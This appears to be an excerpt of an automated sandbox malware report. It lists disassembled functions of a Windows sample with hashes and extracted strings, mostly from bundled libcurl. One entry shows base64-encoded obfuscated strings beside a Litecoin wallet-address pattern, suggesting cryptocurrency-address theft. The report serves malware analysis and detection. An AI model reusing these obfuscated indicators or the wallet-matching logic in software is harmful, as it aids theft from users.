                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: socket
                    • String ID:
                    • API String ID: 98920635-0
                    • Opcode ID: 3f78bb51c2191dd91f293403c47e799a31c2c42317fa876c53d3bdb169312a77
                    • Instruction ID: eec7514b9a49ab99942700f735aed855448b63d64abfb97c8dc8da6e4746a561
                    • Opcode Fuzzy Hash: 3f78bb51c2191dd91f293403c47e799a31c2c42317fa876c53d3bdb169312a77
                    • Instruction Fuzzy Hash: 8D119832B04A8182DB14DF56E18426DB3A1FB48BA4F848235DBBD477C5CF38E891C741
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: FolderPath
                    • String ID:
                    • API String ID: 1514166925-0
                    • Opcode ID: 1553de1249c1a1ff8e29a209769580f7014b2d7bf6379c82235c465a64067054
                    • Instruction ID: 2d165acbba4880037e8b8057dc3be355be4c27b5acf8bca332bd7a92ebaf23eb
                    • Opcode Fuzzy Hash: 1553de1249c1a1ff8e29a209769580f7014b2d7bf6379c82235c465a64067054
                    • Instruction Fuzzy Hash: 69018E33A18B4183E714AF20E45079AA3A0FBD5764FA05335DAB943AC9DFBDD194CA80
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: FolderPath
                    • String ID:
                    • API String ID: 1514166925-0
                    • Opcode ID: a729698e199a3d6a8569ae65cd16fba472315f57ecd68b40bd0020739fcecc4a
                    • Instruction ID: 9da77373354a701610db63eab6d65a906a470d256b4157f237f9232a26f1c366
                    • Opcode Fuzzy Hash: a729698e199a3d6a8569ae65cd16fba472315f57ecd68b40bd0020739fcecc4a
                    • Instruction Fuzzy Hash: 11018E32A1874583E7109F20F84075AB3A0FB91760F905335DAB946AC8DFBDD194CA40
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9706af448fe7867667ff6fecb8a78ab0d2c8a5ee2eb7993fb13eb1bca8668072
                    • Instruction ID: 0a3fe074b351efd532f2ff14611c23b004892b4be438127d4451231a022cad5b
                    • Opcode Fuzzy Hash: 9706af448fe7867667ff6fecb8a78ab0d2c8a5ee2eb7993fb13eb1bca8668072
                    • Instruction Fuzzy Hash: 4A01A221B08B8581EF50AB97A840069A250AF55FF4F544335EE7C477DADF6CD0418380
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 27d459cd3c3b2774064e6a02e7790fba9ae193bdb70d2539e478f3a30ca76f40
                    • Instruction ID: 5769c6569e2674717df6a19bd1b543ccf0829986c1b33c9958d3b3f17309d0e0
                    • Opcode Fuzzy Hash: 27d459cd3c3b2774064e6a02e7790fba9ae193bdb70d2539e478f3a30ca76f40
                    • Instruction Fuzzy Hash: BAD01292F0654AC3FF5D279224491318291AF0DBE4F8C5038CE2C0A3D0DF6CA5E69768
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ioctlsocket
                    • String ID:
                    • API String ID: 3577187118-0
                    • Opcode ID: 024b6feaba463d9576e4ca282350fa309f53f38a7987d7dd162b6d029466228a
                    • Instruction ID: 2dd83542eb9d53034978f5686012afc0404f3793c0511b778f7e2f1696614e74
                    • Opcode Fuzzy Hash: 024b6feaba463d9576e4ca282350fa309f53f38a7987d7dd162b6d029466228a
                    • Instruction Fuzzy Hash: 8BC08056F14581C3C3456F615485097A771FFC4204FD55439D10741228DF3CD2A5DB44
                    APIs
                    • HeapAlloc.KERNEL32(?,?,00000000,00007FF7F1316B40,?,?,?,?,?,?,00000001,?,?,?,00000001,00007FF7F13169F6), ref: 00007FF7F131B642
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: AllocHeap
                    • String ID:
                    • API String ID: 4292702814-0
                    • Opcode ID: 3c8909d93344aa893642bc7e7a0d113f1a4436c06e1cb1835220bd2940c20baf
                    • Instruction ID: c7594faf7ea811ea98e1b834f41fee0977a65650fb2657a8318f48e80d399776
                    • Opcode Fuzzy Hash: 3c8909d93344aa893642bc7e7a0d113f1a4436c06e1cb1835220bd2940c20baf
                    • Instruction Fuzzy Hash: D6F05E01E0D20683FF643B625944275D1A05F947B0F8A1A38DD3E952CADF9CE45045B2
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: htons
                    • String ID: GSS-API confidentiality$ GSS-API integrity$%s/%s$(unknown)$AcquireCredentialsHandle$DecryptMessage$EncryptMessage$Failed to acquire credentials.$Failed to determine username.$Failed to initialise security context.$Failed to query security context attributes.$Failed to receive SSPI authentication response.$Failed to receive SSPI authentication token.$Failed to receive SSPI encryption response.$Failed to receive SSPI encryption type.$Failed to send SSPI authentication request.$Failed to send SSPI authentication token.$Failed to send SSPI encryption request.$Failed to send SSPI encryption type.$InitializeSecurityContext$Invalid SSPI authentication response type (%u %u).$Invalid SSPI encryption response length (%lu).$Invalid SSPI encryption response type (%u %u).$Kerberos$QueryContextAttributes$QueryCredentialAttributes$SOCKS5 access with%s protection granted.$SOCKS5 server authenticated user %s with GSS-API.$SOCKS5 server supports GSS-API %s data protection.$User was rejected by the SOCKS5 server (%u %u).$confidentiality$integrity$out GSS-API data$rcmd
                    • API String ID: 4207154920-3336745200
                    • Opcode ID: c95fbea183440e57502aedaaf381d56e2e801a92193c7b1a7e60c6035e1a2ff2
                    • Instruction ID: 92c4b906d305a14a9e7f12424ded359acc8af36a5280a002c7aef173ed93f5cf
                    • Opcode Fuzzy Hash: c95fbea183440e57502aedaaf381d56e2e801a92193c7b1a7e60c6035e1a2ff2
                    • Instruction Fuzzy Hash: F2724E36B08B42C6EB54AF66D8506B9A7A0FF44B84F810036DA6D837E4DFBCE445D790
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast$getsockname$bindhtons
                    • String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$???$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$PORT$PORT$STOP$[%s] -> [%s]$[%s] ftp_state_use_port(), listening on %d$[%s] ftp_state_use_port(), opened socket$[%s] ftp_state_use_port(), socket bound to port %d$bind() failed, we ran out of ports$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
                    • API String ID: 3168297111-3852301498
                    • Opcode ID: 7c87449af515f339415a60ddc62fe8c292cacbfc05c52449ed9d67934b627bb0
                    • Instruction ID: fc2603d16f7912bb0fe04ba8cdbda7081ebdeecc832bfa1449bfc689e0eaffba
                    • Opcode Fuzzy Hash: 7c87449af515f339415a60ddc62fe8c292cacbfc05c52449ed9d67934b627bb0
                    • Instruction Fuzzy Hash: 8732C662B0C79286EB50ABA5D4002BEB7A0FF45B54FC00136DAAD876D5DFBCE501D7A0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: memcpy_s$_invalid_parameter_noinfo
                    • String ID: $ $%256s "%64[^"]"
                    • API String ID: 2880407647-3012446791
                    • Opcode ID: eca4200553b35554c3054b6b4dde3b6b05d4ef21a39fa10945ae8a33d053bf72
                    • Instruction ID: 8c269902bf76e89f08332bd0b6425f12168c122e92df522909036b6981a8c869
                    • Opcode Fuzzy Hash: eca4200553b35554c3054b6b4dde3b6b05d4ef21a39fa10945ae8a33d053bf72
                    • Instruction Fuzzy Hash: 3503E572B182818BE7799F24D8407EAB7D5FF4478CF805139DA1A57BC4DB79AA00CB90
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID: %64[^:]:%64[^:]:%64[^:]:%64s$%Y%m%dT%H%M%SZ$%s%s%s%s%s%.*s$%s/%s/%s/%s$%s4%s$%s4-HMAC-SHA256%s%s%s$%s4_request$@$@$AWS_SIGV4$Authorization$Authorization: %s4-HMAC-SHA256 Credential=%s/%s, SignedHeaders=%s, Signature=%s%s%s$aws$aws-sigv4: region missing in parameters and hostname$aws-sigv4: region too long in hostname$aws-sigv4: service missing in parameters and hostname$aws-sigv4: service too long in hostname$aws-sigv4: too many query pairs in URL$aws:amz$aws_sigv4: picked region %s from host$aws_sigv4: picked service %s from host$first aws-sigv4 provider cannot be empty$x-%s-content-sha256$x-%s-content-sha256: %s
                    • API String ID: 0-627699795
                    • Opcode ID: e511933d4f9b4214faa954d2774ea04221b251763cf51fee03578e4945d39faf
                    • Instruction ID: 27fe6271906945bf3ef39356e82e4ec91705067022e832269a3bc9dbb01f2cc9
                    • Opcode Fuzzy Hash: e511933d4f9b4214faa954d2774ea04221b251763cf51fee03578e4945d39faf
                    • Instruction Fuzzy Hash: 40729462B18BC285EB20EF60D8503F9A7A0FB55388F805136DA5D876D9EFBCD645C390
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: CreateErrorEventLast
                    • String ID: Time-out$WSACloseEvent failed (%d)$WSACreateEvent failed (%d)$WSAEnumNetworkEvents failed (%d)
                    • API String ID: 545576003-1941740749
                    • Opcode ID: 51213f7343efc5abd71ae55334322dbb76e8153d1cce3eab86992519c7d622a2
                    • Instruction ID: e8bf7ec949768931ce7b50b7d9771c39d768bef2d67c96c6bae1771f6a5a8ebc
                    • Opcode Fuzzy Hash: 51213f7343efc5abd71ae55334322dbb76e8153d1cce3eab86992519c7d622a2
                    • Instruction Fuzzy Hash: 6FE1A632B0868286F764AB65D4507BEB3A0FB44784F844135DE6E876E4DFBEE440C7A4
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: htons$ErrorLast$bind
                    • String ID: Bind to local port %d failed, trying next$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s
                    • API String ID: 662734591-2129795902
                    • Opcode ID: 6d487065223fef661e00cc74092a986b0319b1a8cdf697431ed4d7f8bcc7ca22
                    • Instruction ID: f94c5f5fa76184dcf67459c7816fe001e496c006ca32a95ae79cad8d263a9d88
                    • Opcode Fuzzy Hash: 6d487065223fef661e00cc74092a986b0319b1a8cdf697431ed4d7f8bcc7ca22
                    • Instruction Fuzzy Hash: 33D19662B0878286FB14EB69D4502B9A7A0FF48794F801139EE5D877E5DFBCE540C790
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Cert$CertificateContextCryptDecodeExtensionFindFreeNameObjectString
                    • String ID: 2.5.29.17$schannel: CertFindExtension() returned no extension.$schannel: CertGetNameString() failed to match connection hostname (%s) against server certificate names$schannel: CertGetNameString() returned certificate name information of unexpected size$schannel: CertGetNameString() returned no certificate name information$schannel: CryptDecodeObjectEx() returned no alternate name information.$schannel: Empty DNS name.$schannel: Failed to read remote certificate context: %s$schannel: Null certificate context.$schannel: Null certificate info.$schannel: connection hostname (%s) did not match against certificate name (%s)$schannel: connection hostname (%s) validated against certificate name (%s)$schannel: server certificate name verification failed
                    • API String ID: 1682959454-2028687885
                    • Opcode ID: 9d8ae8c013542bcde4adf99e186dabcaf831f72897c72aa844f91d64041bad74
                    • Instruction ID: 00055370c4917fea271a49c1c3c64ae856d6d3bb24b1bc878e853f45c1ad582d
                    • Opcode Fuzzy Hash: 9d8ae8c013542bcde4adf99e186dabcaf831f72897c72aa844f91d64041bad74
                    • Instruction Fuzzy Hash: 6CB18E35B08A8282EB10AB55E4402B9B7A1FB45BE0FD00235DE7E877D5DFBCE5458790
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Time$FileSystem
                    • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$domain$expires$httponly$invalid octets in name/value, cookie dropped$localhost$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                    • API String ID: 2086374402-1562354863
                    • Opcode ID: 73a7d42cefd9380d410c671d9e8b545f8758e5498e593acdf3a40c8b91da4c51
                    • Instruction ID: 1d560c35bba30e4b44d1dfd8c0ba2ab29fd486aa475f763f4c0ec9ecc0ed652a
                    • Opcode Fuzzy Hash: 73a7d42cefd9380d410c671d9e8b545f8758e5498e593acdf3a40c8b91da4c51
                    • Instruction Fuzzy Hash: 4D72D371B0C68246FB64AB9994803B9A790FF05790FC81135DAAD877C5EFBCE450B3A0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                    • API String ID: 808467561-2761157908
                    • Opcode ID: 1afb5782a578c52eaa61dbd51cd53ba35ff4d20e572f0a8b6a17f1389b3d208d
                    • Instruction ID: eafbff14b0eee1a327811d7f617be7c50648ad8374452199e66c92fe733d00ad
                    • Opcode Fuzzy Hash: 1afb5782a578c52eaa61dbd51cd53ba35ff4d20e572f0a8b6a17f1389b3d208d
                    • Instruction Fuzzy Hash: A6B2F672E182D28BE724AE25D8507FCB7E1FF54348F905179DA2D57AC8DBB8A500CB90
                    APIs
                    Strings
                    • GkEtESJdWlZCHwhMBgJZCChVDCNMIz9ZKFhVfTKL6FKWKGGTFKPcrQej5umtgtNtVqt1VWQVCjlMN15ZSzQDdlxNVVsJW00=, xrefs: 00007FF7F12885D5
                    • EDIgQDUVXxNJaVA8FlxHDw==, xrefs: 00007FF7F128838D
                    • GlkZNl9ZSwhVIihMKzIPRlkFYA==, xrefs: 00007FF7F12884B1
                    • bDJQXjIvE0QTKUQbLEI8OEQ2FEQ7XEJNLxJKcUVSWRIIEApJH1lMVA5ZCDQDd1AcRA==, xrefs: 00007FF7F1288269
                    • ^(L|M)(?:[a-km-zA-HJ-NP-Z1-9]{26,34}|ltc1[a-zA-Z0-9]{28,48})$, xrefs: 00007FF7F12886F3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn
                    • String ID: EDIgQDUVXxNJaVA8FlxHDw==$GkEtESJdWlZCHwhMBgJZCChVDCNMIz9ZKFhVfTKL6FKWKGGTFKPcrQej5umtgtNtVqt1VWQVCjlMN15ZSzQDdlxNVVsJW00=$GlkZNl9ZSwhVIihMKzIPRlkFYA==$^(L|M)(?:[a-km-zA-HJ-NP-Z1-9]{26,34}|ltc1[a-zA-Z0-9]{28,48})$$bDJQXjIvE0QTKUQbLEI8OEQ2FEQ7XEJNLxJKcUVSWRIIEApJH1lMVA5ZCDQDd1AcRA==
                    • API String ID: 3668304517-735059408
                    • Opcode ID: c6bff64f5341b481e5749a2980f68107c82ee5f690dd7f90f8b6c65d5c443bfb
                    • Instruction ID: 91b13cb7fd99a8f9e877fece26dc70cf12b10860233eb3608ad2ffd0a800d294
                    • Opcode Fuzzy Hash: c6bff64f5341b481e5749a2980f68107c82ee5f690dd7f90f8b6c65d5c443bfb
                    • Instruction Fuzzy Hash: 37E1FA52F18B9689FB00EBB5D8412BCA730BF95794F901336D97C51AD5EFAC6180C3A0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: CertCertificateContext$CryptErrorFreeLastObjectQueryStore
                    • String ID: -----END CERTIFICATE-----$-----BEGIN CERTIFICATE-----$schannel: CA file '%s' is not correctly formatted$schannel: added %d certificate(s) from CA file '%s'$schannel: did not add any certificates from CA file '%s'$schannel: failed to add certificate from CA file '%s' to certificate store: %s$schannel: failed to extract certificate from CA file '%s': %s$schannel: unexpected content type '%lu' when extracting certificate from CA file '%s'
                    • API String ID: 854292303-2991118681
                    • Opcode ID: 711fbda6a74f74bcfbd9c1e7846d2bff2021355d056f4584b7db94b8f7b63687
                    • Instruction ID: 51431946a92af96bf119ff52b40d1aaa5d6e486ff5c2063abe7adda4f7da8449
                    • Opcode Fuzzy Hash: 711fbda6a74f74bcfbd9c1e7846d2bff2021355d056f4584b7db94b8f7b63687
                    • Instruction Fuzzy Hash: 7C61C125B0C78282FB20AB95E9002BAE691AF45B90FC41139DE6D877C5DFBCE545C7A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: SimpleString::operator=
                    • String ID: .localhost$.onion$.onion.$127.0.0.1$::1$Hostname %s was found in DNS cache$Not resolving .onion address (RFC 7686)$localhost
                    • API String ID: 356670603-2421204314
                    • Opcode ID: 9f7fcde81f8b245123f1bdbfa2f7829690056eceb82729a51843edb999978ab8
                    • Instruction ID: 5c4490f8ff8975846742c3a28898205f5d59055a59883c410cb3437be4d6a21a
                    • Opcode Fuzzy Hash: 9f7fcde81f8b245123f1bdbfa2f7829690056eceb82729a51843edb999978ab8
                    • Instruction Fuzzy Hash: 24E1D262B0868285FB14EBA981503BDA7A1FB49B98F844135CE2D877C5DFBCE155C3A0
                    APIs
                    Strings
                    Memory Dump Source
